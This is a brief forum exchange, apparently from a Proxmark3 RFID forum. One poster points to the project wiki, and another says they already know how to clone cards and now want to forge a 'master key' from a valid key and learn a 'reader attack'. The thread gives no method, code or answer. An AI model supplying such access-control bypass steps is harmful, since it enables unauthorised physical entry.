Did you read the wiki? https://github.com/Proxmark/proxmark3/wiki It's a good start.
Offline
Iceman, I read it. I know how to clone, but I want to make a master key out of another valid key, and I also want to know the reader attack. I searched everywhere but can find nothing, so can you help me out, iceman?
Offline
Thanks
Offline